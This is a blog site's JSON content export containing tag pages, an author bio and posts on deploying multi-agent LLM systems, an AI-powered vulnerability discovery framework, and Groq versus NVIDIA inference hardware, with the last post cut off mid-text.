[{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/tags/agents/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Agents","type":"tags"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/categories/ai/","section":"Blog Categories: AI, Security, Development \u0026 Infrastructure","summary":"","title":"AI","type":"categories"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/tags/ai/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"AI","type":"tags"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/series/ai-models--releases/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"AI Models \u0026 Releases","type":"series"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/tags/architecture/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Architecture","type":"tags"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/authors/","section":"Authors","summary":"","title":"Authors","type":"authors"},{"content":" Browse by Topic # Posts are organized into broad categories reflecting the main areas covered on this blog:\nAI \u0026amp; Machine Learning — Articles covering artificial intelligence advances, machine learning frameworks, LLMs, and the broader AI landscape. Start here if you\u0026rsquo;re tracking AI developments, evaluating models, or learning about AI\u0026rsquo;s impact on technology and society.\nSecurity \u0026amp; Privacy — In-depth coverage of cybersecurity threats, defensive strategies, vulnerability disclosure, and security best practices. Includes both defensive security and security incident analysis for practitioners and architects.\nDevelopment — Programming languages, frameworks, tooling, and software development practices. 
From JavaScript runtimes to Python evolution, testing approaches to code quality.\nInfrastructure \u0026amp; Operations — Cloud platforms, container orchestration, observability, performance optimization, and the operational practices that keep systems running. Coverage of AWS, Azure, Google Cloud, and Kubernetes.\nOpen Source — Analysis of the open source ecosystem, licensing challenges, community dynamics, and how open-source projects sustain themselves.\nIndustry \u0026amp; Business — Technology industry analysis, market trends, company strategies, funding dynamics, and the business decisions shaping the tech landscape.\nRecommended Starting Points # Interested in AI? Browse the AI category or explore the AI Models \u0026amp; Releases and AI Industry \u0026amp; Regulation series Building secure systems? Start with the Security category or the Cybersecurity Landscape and Supply Chain Security series Managing infrastructure? Explore the Infrastructure category or the Cloud Operations and Kubernetes \u0026amp; Containers series Following a specific language? Check the Development category or language-specific series like JavaScript \u0026amp; Node.js, Python Evolution, or Systems \u0026amp; Emerging Languages All Series # A deeper dive into specific topic areas is available through our complete series list\n","date":"8 June 2026","externalUrl":null,"permalink":"/categories/","section":"Blog Categories: AI, Security, Development \u0026 Infrastructure","summary":"","title":"Blog Categories: AI, Security, Development \u0026 Infrastructure","type":"categories"},{"content":" Explore In-Depth Series # Rather than one-off articles, these series provide sustained coverage of important technology topics. 
Each series organizes related posts into a coherent narrative, helping you understand how technologies evolve and what the developments mean.\nTechnology \u0026amp; Programming # JavaScript \u0026amp; Node.js — The JavaScript ecosystem in motion: Node.js, Deno, Bun, and the evolution of server-side JavaScript development\nPython Evolution — Tracking Python\u0026rsquo;s development, performance improvements, type system advances, and dominance in AI/data science\nSystems \u0026amp; Emerging Languages — Rust, Go, Zig, and the systems programming renaissance reshaping infrastructure\nDeveloper Tooling — IDEs, build systems, CI/CD platforms, AI coding assistants, and tools that shape development experience\nAI \u0026amp; Machine Learning # AI Models \u0026amp; Releases — Foundation model announcements, benchmarks, and what new AI capabilities mean for development\nAI Industry \u0026amp; Regulation — Business, policy, and regulation shaping AI\u0026rsquo;s future; investments and geopolitical dynamics\nOpen Source AI — Open-weight models, fine-tuning, licensing, and the open-source alternative to proprietary AI\nSecurity # Cybersecurity Landscape — Threat trends, defensive strategies, security tooling, and evolving security practices\nBreaches \u0026amp; Zero-Days — Analyzing significant security breaches, vulnerabilities, and lessons for defenders\nSupply Chain Security — Software supply chain attacks, dependency vulnerabilities, and securing the build pipeline\nInfrastructure \u0026amp; Cloud # Cloud Operations — Monitoring, cost optimization, incident response, and operational practices for cloud systems\nCloud Platform Watch — New features, pricing changes, and strategic moves from AWS, Azure, Google Cloud\nKubernetes \u0026amp; Containers — Container orchestration, Kubernetes operations, and the container ecosystem\nIndustry \u0026amp; Open Source # Industry \u0026amp; Platforms — Technology industry analysis: platform strategies, acquisitions, market dynamics, and 
competitive shifts\nOpen Source Chronicles — Governance, licensing, community dynamics, and the stories from the open source world\nHow to Use These Series # New to a topic? Start with the series overview to understand scope and learning path, then explore individual articles in reading order\nStaying current? Subscribe to updates or check back regularly—new articles are added to existing series as developments warrant\nDeep dive? Use the learning path and key topics in each series overview to understand what areas matter most for your use case\nCross-topic insights? Notice the related series mentioned in each series overview—technology trends often connect across multiple areas\n","date":"8 June 2026","externalUrl":null,"permalink":"/series/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","type":"series"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/tags/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","type":"tags"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/tags/development/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Development","type":"tags"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/tags/llm/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"LLM","type":"tags"},{"content":"Six months ago, talking about \u0026ldquo;agent-based systems\u0026rdquo; at an enterprise architecture meeting would have gotten you some skeptical looks. 
Today, it\u0026rsquo;s the question every engineering leader is asking: \u0026ldquo;How do we move our LLMs from chatbots into autonomous agents?\u0026rdquo;\nThe shift is real, and it\u0026rsquo;s reshaping how teams think about AI deployment. We\u0026rsquo;re moving past the era of \u0026ldquo;ChatGPT in a product\u0026rdquo; into the era of \u0026ldquo;systems that coordinate complex workflows without human intervention.\u0026rdquo; This is harder than it sounds, and the teams getting it right are finding that the architectural challenges are bigger than the model challenges.\nI\u0026rsquo;ve been working with several companies navigating this transition over the past few months. What I\u0026rsquo;m seeing is a clear inflection point: companies that treat LLM agents as a straightforward extension of chatbot UX are going to struggle. The ones that respect the architectural complexity are building systems that are genuinely useful.\nFrom Chat Interfaces to Autonomous Workflows # Let me be concrete about what\u0026rsquo;s changed. A year ago, the standard pattern was: \u0026ldquo;We built a chat interface to GPT-4 and deployed it.\u0026rdquo; That worked fine for customer support, basic information retrieval, and copilot-style interfaces where a human is involved in every decision.\nToday\u0026rsquo;s pattern is different: \u0026ldquo;Our system receives a request, spawns multiple specialized agents to investigate different aspects in parallel, orchestrates their findings, flags risks, and executes or recommends an action — all without waiting for human feedback.\u0026rdquo;\nThat\u0026rsquo;s not a chat interface. That\u0026rsquo;s a distributed system.\nThe classic example is code analysis. 
Instead of asking a single LLM \u0026ldquo;analyze this codebase for security issues,\u0026rdquo; you can spawn agents that run in parallel: one analyzing dependency trees, another scanning authentication patterns, another looking for SQL injection vectors, another auditing data handling. They report their findings to an orchestrator, which synthesizes them into a coherent risk assessment. The whole workflow completes in seconds, and each agent has a specific job it\u0026rsquo;s optimized for.\nThis architecture mirrors what we\u0026rsquo;ve learned from microservices, except the \u0026ldquo;services\u0026rdquo; are LLMs with specific prompts and contexts. And just like microservices, this brings real power but also real complexity.\nThe Architecture That Actually Works in Production # The teams I\u0026rsquo;m advising are converging on a few core patterns:\nThe Orchestration Layer sits at the center. It\u0026rsquo;s not an LLM — it\u0026rsquo;s a state machine or a workflow engine that knows how to spawn agents, collect their results, handle failures, and make decisions about what happens next. This is where most engineering complexity lives. Some teams are writing this themselves. Others are adopting frameworks like LangGraph or AutoGen. The choice matters less than recognizing that you need this layer.\nSpecialized Agents are narrow and focused. An agent that \u0026ldquo;does everything\u0026rdquo; is an agent that does nothing well. The ones that work in production have a specific domain: \u0026ldquo;you analyze database queries,\u0026rdquo; \u0026ldquo;you audit permissions,\u0026rdquo; \u0026ldquo;you generate test cases.\u0026rdquo; Each agent has a fixed set of tools it can call, a specific prompt optimized for its domain, and known constraints. This is the opposite of the \u0026ldquo;general-purpose AI\u0026rdquo; narrative we hear in marketing.\nMemory and State is the hidden complexity. 
In a chat interface, context is simple — it\u0026rsquo;s the conversation history. In a multi-agent system, you have shared state (what did Agent A discover?), individual agent state (is Agent B still thinking?), and the overall workflow state (have we collected enough information to make a decision?). Getting this wrong means agents hallucinate, repeat work, or get stuck in loops. The teams handling this best are treating agent state like database transactions — with explicit commit points, rollbacks, and consistency guarantees.\nI worked with one fintech startup that spent weeks debugging an issue where agents were making conflicting recommendations. It turned out that two agents were reading stale state — they\u0026rsquo;d both queried the same account information 500ms apart, and the data had changed in between. That\u0026rsquo;s a distributed systems problem, not an AI problem. They needed to add explicit state versioning and locks.\nError Recovery and Graceful Degradation matter more in production than in prototypes. What happens if an agent times out? What if a tool call fails? What if an agent confidently produces a wrong answer? The best systems I\u0026rsquo;ve seen treat these cases explicitly: they have fallback agents, they log unexpected behaviors for human review, they can degrade to simpler workflows if complex ones fail. This is boring engineering, but it\u0026rsquo;s essential.\nTool Integration: The Real Bottleneck # Here\u0026rsquo;s something that surprised me: the bottleneck in agent systems isn\u0026rsquo;t the LLM, it\u0026rsquo;s the tools.\nWhen an agent needs to take action — query a database, call an API, write to a file system, trigger a deployment — it has to be deeply integrated with your infrastructure. And every integration is a potential security boundary, a failure mode, a place where the agent can go wrong.\nThe teams doing this well have built abstraction layers. 
Instead of giving an agent direct access to your production database, you build a small API service that exposes specific, safe queries. Instead of direct file system access, you expose a file upload API with strict constraints. This is more work upfront, but it means you can scale the number of agents without scaling the security audit effort linearly.\nOne team I worked with was about to give agents direct access to their AWS account via boto3. I suggested we build a small safety layer instead — a service that agents query, which then validates requests against a policy before executing them. It added maybe two days of work. It prevented what could have been a catastrophic mistake.\nThis pattern echoes what we\u0026rsquo;ve learned from cloud infrastructure security: don\u0026rsquo;t scale complexity; scale abstraction. Agents should not see your actual infrastructure. They should see a carefully curated interface to it. AWS best practices for service authentication and the principle of least privilege apply directly to agent tool access control.\nMemory Management at Scale # I\u0026rsquo;ve talked with teams running hundreds of concurrent agents, and they all hit the same wall: memory management becomes the limiting factor.\nEach agent needs context. If you\u0026rsquo;re storing the full conversation history, the full state of the system, and the full output of prior agents, you can fit maybe ten concurrent agents on a reasonable machine before memory explodes. One team hit this at exactly nine agents running in parallel on their setup.\nThe solution is ruthless context pruning. You keep the last N steps of the workflow, you summarize intermediate results, you only pass agents the information they need to make their decision. You trade some theoretical completeness for practical scalability.\nThe other emerging pattern is using specialized storage. 
Instead of keeping everything in memory, you store the full state in a fast KV store (Redis, DynamoDB) and only load what each agent needs into its context window. This adds latency, but it\u0026rsquo;s a tradeoff most production systems are willing to make.\nThink of it like database query optimization. You\u0026rsquo;re reducing the working set to what actually matters. Extended thinking models like Claude\u0026rsquo;s latest release give agents more cognitive capacity for reasoning, but you still need to manage how much context you\u0026rsquo;re passing to them.\nThe Agent Orchestration Patterns That Scale # The orchestrator is where the craft lives. I\u0026rsquo;m seeing three major patterns emerge:\nSequential orchestration is straightforward: Agent A completes, its output goes to Agent B, which completes, output goes to Agent C. This is the easiest to reason about, but it\u0026rsquo;s slow — you can\u0026rsquo;t parallelize. Use this when order matters and latency isn\u0026rsquo;t critical.\nParallel orchestration spawns multiple agents at once (like the code analysis example earlier) and waits for all results before proceeding. This is faster but more complex — you need to handle partial failures (what if one agent errors?), manage concurrent state updates, and synthesize conflicting results.\nConditional/Branching orchestration routes based on results. \u0026ldquo;If Agent A found a critical security issue, invoke the Security Agent. Otherwise, proceed to the standard review.\u0026rdquo; This is the most flexible but also the most complex. You need a clear state machine to avoid infinite loops or contradictory branches.\nThe best systems I\u0026rsquo;ve seen combine all three, depending on the workflow. 
Most workflows are 70% sequential (this step logically depends on the last one), 20% parallel (these aspects can be analyzed independently), and 10% conditional (some paths fork based on results).\nThe Debugging and Observability Crisis # Here\u0026rsquo;s a problem nobody talks about enough: agent systems are incredibly hard to debug.\nWhen a chatbot gives a wrong answer, you can see the conversation and ask the user what went wrong. When an agent system makes a wrong decision, you have to trace through:\nWhat instructions did it receive? What tools did it call? What were the results? What state was it operating from? Did it have conflicting information? Where exactly did it diverge from what should have happened? One team spent two days debugging why an agent kept recommending the wrong approach to a customer. Turns out the agent was reading stale state — a previous customer\u0026rsquo;s information was cached in its context. By the time they figured it out, the system had already made bad recommendations to twelve customers.\nThe solution is comprehensive observability. Every agent call, tool invocation, state update, and decision needs to be logged with context. You need to be able to replay the entire execution trace. You need to know not just what the agent decided, but why it decided it, what alternatives it considered, and what data it was working from. Frameworks like LangSmith and observability platforms like Datadog APM provide purpose-built tools for this. The OpenTelemetry specification offers standardized instrumentation patterns that work across agent frameworks.\nThis is more engineering overhead than most teams budget for. But I\u0026rsquo;d argue it\u0026rsquo;s non-negotiable in production. 
If your agent system is making decisions that affect customers or business outcomes, you need to be able to explain those decisions after the fact.\nTeams That Got It Right # The companies navigating this successfully share a few traits:\nFirst, they\u0026rsquo;re clear about scope. They\u0026rsquo;re not trying to build a general-purpose autonomous system. They\u0026rsquo;re building a system for a specific problem: contract analysis, incident response, customer onboarding, code review — something concrete with defined success criteria.\nSecond, they\u0026rsquo;re paranoid about safety. They assume agents will occasionally make wrong decisions, and they build detection and correction mechanisms into the workflow. They don\u0026rsquo;t assume \u0026ldquo;better models = fewer mistakes.\u0026rdquo; They engineer for mistakes to happen and be caught. Safety evaluation frameworks like HELM and adversarial testing approaches provide structured methodologies for identifying failure modes.\nThird, they\u0026rsquo;re patient with infrastructure. They don\u0026rsquo;t try to run production agent systems on a weekend hack. They invest in proper orchestration frameworks, observability, state management, and tool safety layers. This work isn\u0026rsquo;t glamorous, but it\u0026rsquo;s essential.\nFourth, they\u0026rsquo;re honest about limitations. I\u0026rsquo;ve yet to meet a team that successfully deployed agents without human oversight loops. The pattern is: agents do the work, humans review the high-risk decisions or outcomes. This isn\u0026rsquo;t a failure of the approach — it\u0026rsquo;s a realistic assessment of what autonomous systems can do today.\nThe Talent Gap # One thing I haven\u0026rsquo;t mentioned enough: building production agent systems requires different skills than building chatbots.\nYou need systems engineers who understand distributed state management, not just prompt engineers who know how to coax better outputs from LLMs. 
You need people who understand failure modes and recovery, not just people who read LLM documentation. You need people who treat agent systems like infrastructure, not like clever scripts.\nMost companies have the second group and lack the first. This is creating a talent bottleneck. If you\u0026rsquo;re hiring right now for agent teams, you want systems engineers with platform experience, not just AI engineers with ChatGPT experience. The skill transfer is real but non-trivial.\nThe Next Phase: Agents Coordinating Other Agents # Once you have one agent system working, the next logical step is having agents spawn other agents. This is where things get genuinely complex.\nImagine a system where a high-level agent receives a business request, decomposes it into subproblems, spawns sub-agents to handle each subproblem, aggregates their results, and decides on a final action. Each sub-agent might spawn its own sub-agents. This is a recursive, hierarchical agent system — and it\u0026rsquo;s where the hardest problems live.\nHow do you prevent infinite recursion? How do you track state across multiple levels? How do you handle a sub-agent that takes an hour to complete? How do you debug a problem that emerged from a sub-agent\u0026rsquo;s sub-agent\u0026rsquo;s decision?\nI haven\u0026rsquo;t seen this pattern in production yet. A few teams are experimenting with it, and the ones I\u0026rsquo;m advising are treating it carefully. It\u0026rsquo;s the next frontier, but it\u0026rsquo;s not \u0026ldquo;ready\u0026rdquo; for mission-critical systems. Give it another year.\nMy Take # The shift from chat interfaces to production agent systems is real and accelerating. But it\u0026rsquo;s not a simple \u0026ldquo;bigger models = better agents\u0026rdquo; story. It\u0026rsquo;s a complex architectural problem that requires systems thinking, careful engineering, and honest assessment of limitations.\nThe companies that get this right will have significant competitive advantages. 
Being able to automate complex, knowledge-intensive workflows autonomously is genuinely valuable. But the path there is longer and more engineering-intensive than most teams expect.\nIf you\u0026rsquo;re considering agent systems for your organization, start with a specific, bounded problem. Don\u0026rsquo;t try to solve everything at once. Invest in orchestration, observability, and safety mechanisms upfront. Assume agents will occasionally be wrong and build detection and correction into your workflows. And hire systems engineers, not just AI enthusiasts.\nThe technology is ready. The hard part is building the systems discipline to use it safely. The teams that respect that challenge will ship production agent systems that actually work. The teams that see it as \u0026ldquo;just add AI\u0026rdquo; will learn some expensive lessons the hard way.\nProduction LLM agents are here. The question isn\u0026rsquo;t whether to use them. It\u0026rsquo;s how to use them responsibly at scale.\n","date":"8 June 2026","externalUrl":null,"permalink":"/posts/260608-llm-agents-production/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Multi-agent LLM systems are shifting from experimental chat interfaces to autonomous production systems. Here’s what production deployment actually looks like, and why the architectural patterns matter more than the models.","title":"LLM Agents in Production — Moving Beyond Chat Interfaces","type":"posts"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/authors/osmond-van-hemert/","section":"Authors","summary":"","title":"Osmond Van Hemert","type":"authors"},{"content":"I\u0026rsquo;m Osmond — a senior software engineer based in The Netherlands, with 30 years of experience and the last decade spent mostly remote. 
My day job is mostly TypeScript on Node, React, and Kubernetes; my evenings are AI coding agents, a homelab that I keep promising myself I\u0026rsquo;ll downsize, and trying to keep up with the supply-chain security news cycle. Every Thursday since 2020 I write down what I learned that week — that\u0026rsquo;s this site.\n","date":"8 June 2026","externalUrl":null,"permalink":"/","section":"Osmond van Hemert — Senior Software Engineer","summary":"","title":"Osmond van Hemert — Senior Software Engineer","type":"page"},{"content":"","date":"8 June 2026","externalUrl":null,"permalink":"/posts/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"","title":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","type":"posts"},{"content":"","date":"6 June 2026","externalUrl":null,"permalink":"/series/ai-in-development/","section":"Blog Series: In-Depth Tech Coverage on AI, Security \u0026 Cloud","summary":"","title":"AI in Development","type":"series"},{"content":"Anthropic just released defending-code-reference-harness, an open-source framework for automated vulnerability discovery powered by AI. The timing is significant, and the implications are profound. We\u0026rsquo;re watching the gap between manual security code review and automated vulnerability detection close in real time — and AI is doing the closing.\nThis framework represents exactly the kind of practical AI application that I discussed during the RSA Conference 2024 AI security panel — not flashy generative demos, but tools that solve real developer problems with real business impact.\nThis isn\u0026rsquo;t a small tool or a niche experiment. The Hacker News response (372 upvotes) reflects something the security community has been waiting for: a practical, production-ready approach to using large language models not for code generation, but for security analysis. 
That\u0026rsquo;s a different problem, and Anthropic\u0026rsquo;s framework shows you can apply AI language understanding to catch things that static analysis and pattern matching consistently miss.\nWhy AI for Vulnerability Discovery? # Let me be honest about where we are with vulnerability detection today. Static analysis tools — Snyk, Semgrep, CodeQL — are excellent for known patterns. They scale. They\u0026rsquo;re fast. They integrate into CI/CD pipelines. But they operate within the constraints of what you can express as rules. They catch SQL injection when you pass untrusted input to a database query. They catch the obvious cases.\nWhat they miss are the subtle cases. The business logic vulnerability. The authorization check that looks correct but isn\u0026rsquo;t enforced on a secondary code path. The timing attack in cryptographic code. The off-by-one error in a buffer boundary check that most linters won\u0026rsquo;t flag because the code isn\u0026rsquo;t explicitly dangerous — it\u0026rsquo;s just subtly wrong.\nThese are the vulnerabilities that security researchers find through patient, expensive manual code review. A senior engineer who has spent years understanding both application code and attack primitives can look at a function and see the flaw. But you can\u0026rsquo;t hire enough of those people, and even if you could, the process doesn\u0026rsquo;t scale to the codebases we\u0026rsquo;re building today.\nAnthropic\u0026rsquo;s framework bridges that gap by doing something conventional tooling can\u0026rsquo;t: it understands context, follows logic chains, and reasons about security implications in ways that require language understanding, not just pattern matching.\nHow It Works in Practice # The framework isn\u0026rsquo;t magic. It\u0026rsquo;s a well-engineered system for using Claude to systematically analyze code for potential vulnerabilities. 
Here\u0026rsquo;s the key insight: you give Claude the code, context about what it\u0026rsquo;s supposed to do, and examples of the kinds of vulnerabilities you care about. The model then reasons through the code, identifies potential issues, and explains its findings.\nWhat makes this different from \u0026ldquo;just ask Claude to review your code\u0026rdquo; is the engineering discipline. The framework includes:\nPrompt engineering patterns that structure how to ask Claude questions about security in ways that elicit useful analysis rather than generic commentary. Iterative analysis — multiple passes over the same code, each asking different questions to build a comprehensive picture. Integration patterns for turning AI analysis into actionable findings that developers can act on without being drowned in false positives. Chain-of-thought reasoning — Claude shows its work, explaining why something is a vulnerability, not just flagging it. This last part is crucial. When a static analysis tool flags something, it tells you the rule that matched. When Claude analyzes code, it can explain the security implication in terms of how an attacker could actually exploit the issue. That context dramatically increases the signal-to-noise ratio for developers.\nThe Vulnerability Blind Spots This Addresses # In my experience consulting with teams on security, there are classes of vulnerabilities that consistently slip through because they\u0026rsquo;re not amenable to automation. These are the gaps that traditional tools like Snyk and CodeQL (excellent as they are) struggle with:\nBusiness Logic and Authorization Flaws # A discount code that can be applied multiple times when it should only work once. A permission check that works for the main flow but not for an edge case. These require understanding what the code is supposed to do, not just analyzing syntax.\nAuthorization boundary issues. 
A function that enforces authorization for direct calls but not for calls from other internal functions. A public method that should be private. Multi-tenant systems where authorization checks are incomplete.\nInformation disclosure through side channels. Subtle timing variations in cryptographic implementations. Error messages that leak information about whether a user exists. Cache behavior that can be exploited to determine sensitive information.\nIncorrect error handling in security context. Exceptions caught too broadly, swallowing security-critical information. Errors that trigger recovery code paths that bypass security checks.\nConcurrency and state management bugs. Race conditions in authorization checks. Non-atomic operations that should be atomic. State that\u0026rsquo;s shared between requests when it should be isolated.\nThese vulnerabilities share something in common: they\u0026rsquo;re not violations of a discrete rule, they\u0026rsquo;re violations of intent. Static analysis struggles with intent. AI doesn\u0026rsquo;t. This is why Claude\u0026rsquo;s reasoning capabilities matter — the model needs to understand not just code syntax, but the semantic intent behind it. OWASP\u0026rsquo;s categorization of authorization flaws attempts to capture these patterns, but detection remains fundamentally a reasoning problem.\nIntegration Into Development Workflow # Here\u0026rsquo;s where the practical value emerges. The framework is designed to fit into existing development workflows, not replace them. You\u0026rsquo;re not ditching your Snyk integration. You\u0026rsquo;re adding an additional layer of analysis that catches what Snyk doesn\u0026rsquo;t.\nThink of it this way: static analysis is your gatekeeper, catching 80% of issues through pattern matching. 
AI analysis is your expert consultant, coming in on higher-risk code and business-critical functions to catch the remaining 20% that requires reasoning.\nFor security-critical code — authentication, authorization, cryptography, payment processing — running the Anthropic framework as part of your pull request review process makes sense. Yes, you\u0026rsquo;ll spend API credits. But the cost of a single undetected vulnerability in production — in remediation, customer communication, and reputation damage — dwarfs the cost of running comprehensive AI analysis.\nThe framework includes examples of how to structure this: run it against modified files in a PR, get structured findings, surface them in the PR comments, let developers respond. It integrates with the tools you already use.\nThe Supply Chain Security Angle # This framework also matters in a supply chain context, which I\u0026rsquo;ve written about extensively. As third-party dependencies become increasingly security-critical, and as supply chain attacks continue to evolve, the ability to do rapid, comprehensive security analysis of code before deployment becomes essential.\nThe Codecov supply chain incident in 2021 showed us how quickly security tooling itself can become a vector for compromise. Being able to apply AI analysis to the code you\u0026rsquo;re about to trust your entire build pipeline to is not just a nice-to-have — it\u0026rsquo;s becoming essential risk management.\nImagine applying this framework to your critical dependencies before updating them. You\u0026rsquo;re not doing manual security review of every transitive dependency (impossible), but you are applying automated AI analysis to the code paths you actually use. 
For organizations building on top of open-source foundations, this is a meaningful way to increase confidence in your supply chain.\nThe Reality Check # I need to be clear about what this is not: it\u0026rsquo;s not a replacement for threat modeling, security architecture review, or pen testing. Those are fundamentally different activities that require different expertise and approaches.\nWhat it is: a tool that amplifies the leverage of security-aware developers. A developer who understands security can use this framework to catch more issues in their own code before review. A security team can use it to do more thorough reviews of critical code paths with the same headcount.\nThere are also legitimate concerns about bias in AI-generated analysis. Claude is trained on code from the internet, which includes plenty of insecure code. You need to validate that the framework isn\u0026rsquo;t just finding \u0026ldquo;common patterns\u0026rdquo; but actually understanding security principles. Anthropic\u0026rsquo;s approach of making this open-source means the community can audit and improve it, which is the right move.\nWhat This Means for the Security Stack # We\u0026rsquo;re at an inflection point in how security tooling works. For the past decade, the trend has been: more rules, better pattern matching, faster scanning. That approach has hit its limits. You can\u0026rsquo;t express every possible vulnerability as a rule. You can\u0026rsquo;t pattern-match your way to understanding business logic.\nThe next era is: automated reasoning. Using language models that can understand code in context and reason about security implications. Claude 3 and beyond are the foundational capability that makes this possible. 
Anthropic\u0026rsquo;s research on constitutional AI and reasoning informs how the vulnerability discovery framework approaches security analysis.\nI expect to see waves of security tooling over the next 12-18 months that layer AI reasoning on top of traditional static analysis. Some will be good, some will be hype and vapor. Anthropic\u0026rsquo;s framework is good because it\u0026rsquo;s grounded in actual security challenges and released as an open-source reference implementation on GitHub, not a black-box SaaS offering that you have to trust completely.\nCompare this to proprietary tools that hide their analysis methodology. With open-source frameworks like this one, you can audit what the AI is doing, add domain-specific vulnerability patterns, and adapt it to your organization\u0026rsquo;s specific risk profile. That transparency is essential for any security tool that\u0026rsquo;s going to make decisions about what gets deployed. This aligns with CISA\u0026rsquo;s secure software development framework and the industry\u0026rsquo;s push toward verifiable security practices.\nMy Take # Anthropic\u0026rsquo;s vulnerability discovery framework is one of the most practically useful applications of LLMs I\u0026rsquo;ve seen in security. It doesn\u0026rsquo;t promise to find every vulnerability (nothing does). It doesn\u0026rsquo;t replace security expertise. But it does something tangible: it lets organizations with moderate security resources apply something closer to expert-level analysis to code that matters most.\nI\u0026rsquo;ve been building software long enough to remember when security code review was done by anyone available, then by specialized teams, then by rotating senior developers, then by external security firms. Each evolution was driven by the same pressure: more code than people, and security defects are catastrophically expensive.\nAI isn\u0026rsquo;t the final answer to that pressure, but it\u0026rsquo;s a meaningful step forward. 
The framework is open-source, the code is well-written, and Anthropic has clearly thought about how this integrates into real development workflows. If you\u0026rsquo;re building security-critical code and you\u0026rsquo;re not yet experimenting with AI-assisted analysis, this is the time to start.\nThe next generation of secure development practices will be built with these tools as a foundation.\n","date":"6 June 2026","externalUrl":null,"permalink":"/posts/260606-anthropic-vulnerability-discovery-framework/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Anthropic released an open-source framework for automated vulnerability discovery powered by AI. This represents a fundamental shift in how security analysis can scale — from manual expert review to AI-assisted code hardening at development time.","title":"Anthropic's AI Vulnerability Discovery Framework — Automating Security at Code Level","type":"posts"},{"content":"","date":"6 June 2026","externalUrl":null,"permalink":"/tags/cybersecurity/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Cybersecurity","type":"tags"},{"content":"","date":"6 June 2026","externalUrl":null,"permalink":"/categories/security/","section":"Blog Categories: AI, Security, Development \u0026 Infrastructure","summary":"","title":"Security","type":"categories"},{"content":"","date":"6 June 2026","externalUrl":null,"permalink":"/tags/security-tooling/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"Security Tooling","type":"tags"},{"content":"","date":"4 June 2026","externalUrl":null,"permalink":"/tags/ai-infrastructure/","section":"Blog Tags: Software Development, AI, Security \u0026 Infrastructure","summary":"","title":"AI Infrastructure","type":"tags"},{"content":"","date":"4 June 2026","externalUrl":null,"permalink":"/tags/cloud-computing/","section":"Blog Tags: Software Development, AI, 
Security \u0026 Infrastructure","summary":"","title":"Cloud Computing","type":"tags"},{"content":"Last month, Groq released new benchmarks showing their custom LPU (Language Processing Unit) chips significantly outperforming NVIDIA\u0026rsquo;s latest H100 GPUs on standard LLM inference workloads. The numbers are striking: 2-3x throughput improvements for inference tasks, lower power consumption, and — this is the part that matters — lower total cost of ownership at scale.\nLet\u0026rsquo;s be honest about what happened here: for the past three years, NVIDIA has been untouchable. If you needed to run AI workloads, you bought GPUs. It wasn\u0026rsquo;t a choice, it was a law of physics. Every major cloud provider, every AI startup, every infrastructure team I\u0026rsquo;ve consulted with has been locked into the same equation: scale inference = buy more H100s.\nGroq\u0026rsquo;s LPU chips might change that equation.\nI\u0026rsquo;m not saying this is the end of NVIDIA dominance. NVIDIA has too much momentum, too much ecosystem investment, too much customer lock-in. But for the first time in years, there\u0026rsquo;s a legitimate alternative for a specific, critical workload: cost-sensitive inference at scale. If you\u0026rsquo;re running inference workloads where latency isn\u0026rsquo;t your primary constraint and cost is, Groq\u0026rsquo;s infrastructure starts to look very interesting.\nThe LPU Architecture: Why It Matters # Here\u0026rsquo;s the core technical difference: NVIDIA GPUs were designed to be general-purpose parallel processors. They\u0026rsquo;re good at inference, but they\u0026rsquo;re also good at training, graphics, scientific computing, and everything else. That generality is both a strength and a constraint.\nGroq\u0026rsquo;s LPU chips are purpose-built for LLM inference specifically. No training. No graphics. No compromises. 
The architecture is optimized entirely around the computational patterns that large language models actually exhibit: matrix operations for embeddings and attention layers, sequential token generation, and the specific memory access patterns of transformer networks.\nThe result: when specialized hardware meets optimized algorithms, efficiency gains compound. Groq achieves higher throughput on inference workloads while consuming significantly less power than equivalent GPU setups. In real infrastructure terms, that means fewer chips to buy, less power infrastructure to build, less cooling capacity required, and lower ongoing energy costs.\nThis matters in a specific context. The economics of LLM serving changed fundamentally over the past 18 months. When inference was new and novel, latency was the obsession — everyone wanted sub-100ms response times. But as these systems moved to production, it became clear that for most applications, inference latency below 500ms is acceptable. What actually matters at scale is throughput (tokens per second) and the cost per inference request.\nThat shift in priorities opens the door for specialized hardware. NVIDIA GPUs are fantastic at low-latency inference. Groq\u0026rsquo;s LPU chips are fantastic at high-throughput, cost-optimized inference. For most real-world workloads — customer support chatbots, content generation, batch processing — the throughput metric is more important.\nWhy NVIDIA Isn\u0026rsquo;t Worried Yet (But Should Be Watching) # NVIDIA\u0026rsquo;s dominance isn\u0026rsquo;t threatened tomorrow. Here\u0026rsquo;s why:\nEcosystem momentum. Every major cloud provider (AWS, Azure, GCP) has massive investments in GPU infrastructure. Engineers have CUDA expertise. Models are optimized for NVIDIA\u0026rsquo;s hardware. Libraries, frameworks, everything is built around GPUs. You don\u0026rsquo;t unwind that overnight.\nTraining workloads. Groq\u0026rsquo;s LPU chips are optimized for inference. 
